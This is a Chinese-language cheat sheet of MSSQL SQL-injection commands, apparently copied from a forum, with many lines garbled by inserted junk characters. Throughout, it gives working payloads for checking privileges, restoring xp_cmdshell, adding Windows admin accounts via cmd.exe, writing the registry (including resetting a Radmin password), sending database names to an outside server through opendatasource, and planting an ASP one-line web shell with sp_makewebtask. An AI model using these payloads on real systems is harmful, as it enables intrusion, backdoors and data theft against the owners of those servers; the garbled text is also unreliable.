常用的一些注入命令

admin

//看看是什么权限的
  D8 g8 S! G9 `: P; [# A, Fand 1=(Select IS_MEMBER('db_owner'))
5 w* {# T) b& qAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
: L9 Q) l( g  s
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

% \; H: L8 i  _1 K, D
数字类型
) E/ }) J6 O6 t4 eand char(124)%2Buser%2Bchar(124)=0
! i% \6 u% C( K
5 f8 P' ?! [; z4 u6 n. R  c7 n, [字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
0 j/ |) p* |( T
爆用户名
* Z% D, |* U% ?; K7 Band user>0
' and user>0 and ''='

; C$ k7 r4 c. l5 U4 \+ o# a; U检测是否为SA权限
! T2 z) w" B1 s+ ~+ o- j% sand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
7 v5 X+ S1 ~7 w4 Z' I0 [+ [And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

4 R  N# [% r" @$ U0 L( y2 X  y7 y检测是不是MSSQL数据库
and exists (select * from sysobjects);--

0 e% W0 {( _4 x! G/ C检测是否支持多行
* l: X3 {- K1 H' N# G;declare @d int;--
% N' t3 S4 |- x( C
: h) C0 |6 P6 J1 v, O恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
" S7 `) \! p( J; }
( n0 D6 q6 g1 c  P! r
9 w. I1 p) o6 [6 zselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

. R& C6 u* Y+ d4 E+ O; [//-----------------------
//       执行命令
//-----------------------
首先开启沙盘模式：
6 w7 U  D% _: r% H' A- m! |exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

# i5 K$ B! O% n9 t0 }9 p! w! n* x然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. ?3 d/ u) u- T7 w" T
$ E5 L& x% I2 Q: o执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
# D9 W" a" A4 e: J) O& ]8 s
$ W0 g) g( c  w) z) o! UEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
( B+ C$ n" i& F  Q8 h4 A$ \- t/ j
( V5 Y) P! z" ], M写注册表
; E, O8 v' ?1 s: d" J$ d2 Gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
9 T7 d& s) w6 W7 l: ?% a1 n
- J8 [9 M0 u8 i$ Z; i! C9 `+ {REG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
4 q6 @4 A0 Q+ v$ t+ z
( n# E) ~& d6 m# ~  I4 w读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


5 _# Y) d4 f$ ~% w8 |数据库备份
( f5 c1 P+ V# Obackup database pubs to disk = 'c:\123.bak'
8 I* z( F- A6 o6 u9 S" e% _9 N
9 _( O  ^; x1 K" {$ p6 M4 d. J//爆出长度
' @: N; P6 @" u; _5 X; NAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
! _$ a  `3 z6 B, R; l; _+ ~

! a) C& V8 @! Y" c' k8 ]& Z2 P' a
+ O  U6 \( q+ T6 G更改sa口令方法：用sql综合利用工具连接后，执行命令：
4 f9 K& n. ~; C6 v7 e. g& [exec sp_password NULL,'新密码','sa'
( n# t5 R1 @: m( E
添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
( |' ]  W9 k! {& y  _9 {+ aexec master.dbo.sp_addsrvrolemember test,sysadmin
2 Q7 |9 X! F. u, m
3 r; F* R+ G1 N% y6 \删除扩展存储过过程xp_cmdshell的语句:
$ P& }5 w& B2 v+ _* T* C- D0 aexec sp_dropextendedproc 'xp_cmdshell'

1 k2 S" T* R3 A2 O) d3 ]添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


1 X9 k5 e2 J- P' J4 M9 X' f停掉或激活某个服务。
0 r/ X9 |6 [* R: r6 x
- m! G6 G9 V1 }+ A% Y$ C- Oexec master..xp_servicecontrol 'stop','schedule'
# L, C3 J! L) X% W: }" sexec master..xp_servicecontrol 'start','schedule'

3 N4 P6 r! S# [+ c6 f. @& a) g4 ^& A. fdbo.xp_subdirs
. J+ J1 O  O( R$ a7 [4 @
只列某个目录下的子目录。
0 W3 D3 d: M5 p% b2 n. bxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

5 C5 ^- Z( [6 x/ v- Vdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
" u; b6 Q9 z- |
; n6 u9 `6 ]: [  ~5 ?dbo.xp_makecab
! o1 n" t9 R" i8 |: S'c:\test.cab','mszip',1,
2 x$ V; ?" }! K, S4 j/ j9 b; y1 P'C:\Inetpub\wwwroot\SQLInject\login.asp',
. t. p2 U+ V( v'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

& C1 M2 n* [. q9 V0 o2 w. ]7 w+ x/ wxp_terminate_process
* _, ~; C2 L1 d
7 @+ V2 D% V3 e# B' `+ j/ Z" ^停掉某个执行中的程序，但赋予的参数是 Process ID。
& S2 ?0 ^1 e4 Y8 C利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

# J7 P3 k( {7 K$ exp_terminate_process 2484

4 z$ |7 l3 u1 c9 p& Y/ B& pxp_unpackcab

解开压缩档。

& M+ R4 J. b7 z! Mxp_unpackcab 'c:\test.cab','c:\temp',1

, i3 z: z( t% v( u& {5 g
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
9 t& r1 J- ^" s/ P, |* Q/ y$ M
create database lcx;
0 g8 S/ h, }; H* v1 G! KCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
! r! U3 D2 n: J+ l- ^9 ]! `* }( h8 n
//得到数据库名
- T3 f( @% Z0 N9 L2 h: t2 X" Ginsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


6 \' d, }) Q" D//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

$ s3 c! ?' L$ O//更新表内容
5 n+ V  {7 g- [6 [Update films SET kind = 'Dramatic' Where id = 123
! @! A8 W8 \, J, m; d8 n3 I
//删除内容
delete from table_name where Stockid = 3